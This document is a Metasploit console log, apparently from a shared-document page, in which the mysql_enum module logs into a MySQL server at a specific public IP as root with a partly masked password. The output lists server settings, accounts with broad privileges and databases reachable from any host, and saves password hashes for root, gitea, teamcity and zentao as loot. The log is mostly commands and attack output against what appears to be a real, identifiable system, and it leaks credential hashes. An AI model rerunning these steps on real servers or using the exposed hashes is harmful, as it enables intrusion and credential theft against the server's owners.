You are on page 1of 2

msf6 auxiliary(admin/mysql/mysql_enum) > options

Module options (auxiliary/admin/mysql/mysql_enum):

Name Current Setting Required Description


---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see
https://github.com/rapid7/metasploit-framew
ork/wiki/Using-Metasploit
RPORT 3306 yes The target port (TCP)
USERNAME no The username to authenticate as

msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 122.51.91.155


RHOSTS => 122.51.91.155
msf6 auxiliary(admin/mysql/mysql_enum) > SET username root
[-] Unknown command: SET
msf6 auxiliary(admin/mysql/mysql_enum) > set username root
username => root
msf6 auxiliary(admin/mysql/mysql_enum) > set password VT@4bCO***aZ
password => VT@4bCO***aZ
msf6 auxiliary(admin/mysql/mysql_enum) > exploit

[*] Running module against 122.51.91.155

[*] 122.51.91.155:3306 - Running MySQL Enumerator...


[*] 122.51.91.155:3306 - Enumerating Parameters
[*] 122.51.91.155:3306 - MySQL Version: 5.7.27-log
[*] 122.51.91.155:3306 - Compiled for the following OS: linux-glibc2.12
[*] 122.51.91.155:3306 - Architecture: x86_64
[*] 122.51.91.155:3306 - Server Hostname: meiguo-txc01
[*] 122.51.91.155:3306 - Data Directory: /data/mysql/data/
[*] 122.51.91.155:3306 - Logging of queries and logins: ON
[*] 122.51.91.155:3306 - Log Files Location: OFF
[*] 122.51.91.155:3306 - Old Password Hashing Algorithm 0
[*] 122.51.91.155:3306 - Loading of local files: ON
[*] 122.51.91.155:3306 - Deny logins with old Pre-4.1 Passwords: ON
[*] 122.51.91.155:3306 - Allow Use of symlinks for Database Files: DISABLED
[*] 122.51.91.155:3306 - Allow Table Merge:
[*] 122.51.91.155:3306 - SSL Connection: DISABLED
[*] 122.51.91.155:3306 - Enumerating Accounts:
[-] 122.51.91.155:3306 - MySQL Error: RbMysql::ServerError::BadFieldError Unknown
column 'password' in 'field list'
[*] 122.51.91.155:3306 - The following users have GRANT Privilege:
[*] 122.51.91.155:3306 - User: root Host: %
[*] 122.51.91.155:3306 - The following users have CREATE USER Privilege:
[*] 122.51.91.155:3306 - User: root Host: %
[*] 122.51.91.155:3306 - The following users have RELOAD Privilege:
[*] 122.51.91.155:3306 - User: root Host: %
[*] 122.51.91.155:3306 - The following users have SHUTDOWN Privilege:
[*] 122.51.91.155:3306 - User: root Host: %
[*] 122.51.91.155:3306 - The following users have SUPER Privilege:
[*] 122.51.91.155:3306 - User: root Host: %
[*] 122.51.91.155:3306 - User: mysql.session Host: localhost
[*] 122.51.91.155:3306 - The following users have FILE Privilege:
[*] 122.51.91.155:3306 - User: root Host: %
[*] 122.51.91.155:3306 - The following users have PROCESS Privilege:
[*] 122.51.91.155:3306 - User: root Host: %
[*] 122.51.91.155:3306 - The following accounts have privileges to the mysql
database:
[*] 122.51.91.155:3306 - User: root Host: %
[-] 122.51.91.155:3306 - MySQL Error: RbMysql::ServerError::BadFieldError Unknown
column 'password' in 'field list'
[*] 122.51.91.155:3306 - The following accounts are not restricted by
source:
[*] 122.51.91.155:3306 - User: gitea Host: %
[*] 122.51.91.155:3306 - User: root Host: %
[*] 122.51.91.155:3306 - User: teamcity Host: %
[*] 122.51.91.155:3306 - User: zentao Host: %

-----------------------------------------------------------------------------------
-----------------------------------

[+] 122.51.91.155:3306 - Saving HashString as Loot:


root:*EA800FFE9AE7E840150117DA7C75734E2354E01E
[+] 122.51.91.155:3306 - Saving HashString as Loot:
mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 122.51.91.155:3306 - Saving HashString as Loot:
mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 122.51.91.155:3306 - Saving HashString as Loot:
gitea:*46B5445A7DC07E11F031026A9C5594ADB62B9786
[+] 122.51.91.155:3306 - Saving HashString as Loot:
teamcity:*D2EFF4B8A7F8976379A43E906A7AB0DDFC8E3761
[+] 122.51.91.155:3306 - Saving HashString as Loot:
zentao:*EF60F817ED3B9DEB10AABFE2D3E72A6486A28451

[*] 122.51.91.155:3306 - Sending statement: 'show databases'...


[*] 122.51.91.155:3306 - | information_schema |
[*] 122.51.91.155:3306 - | company |
[*] 122.51.91.155:3306 - | dmz |
[*] 122.51.91.155:3306 - | dong |
[*] 122.51.91.155:3306 - | dongfu |
[*] 122.51.91.155:3306 - | gitea |
[*] 122.51.91.155:3306 - | haitian |
[*] 122.51.91.155:3306 - | haitian_new |
[*] 122.51.91.155:3306 - | hrshunfeng |
[*] 122.51.91.155:3306 - | huafei |
[*] 122.51.91.155:3306 - | junteng01 |
[*] 122.51.91.155:3306 - | meiguo |
[*] 122.51.91.155:3306 - | meiguonet |
[*] 122.51.91.155:3306 - | mg_common_service |
[*] 122.51.91.155:3306 - | miaomiaoce |
[*] 122.51.91.155:3306 - | mstj |
[*] 122.51.91.155:3306 - | mstore |
[*] 122.51.91.155:3306 - | mysql |
[*] 122.51.91.155:3306 - | performance_schema |
[*] 122.51.91.155:3306 - | qimeng01 |
[*] 122.51.91.155:3306 - | sys |
[*] 122.51.91.155:3306 - | teamcity |
[*] 122.51.91.155:3306 - | xc |
[*] 122.51.91.155:3306 - | yanyu |
[*] 122.51.91.155:3306 - | zentaopms |
[*] 122.51.91.155:3306 - | zhongchuang |
[*] 122.51.91.155:3306 - | zhongguan |
[*] 122.51.91.155:3306 - | zywh-new |
[*] Auxiliary module execution completed

You might also like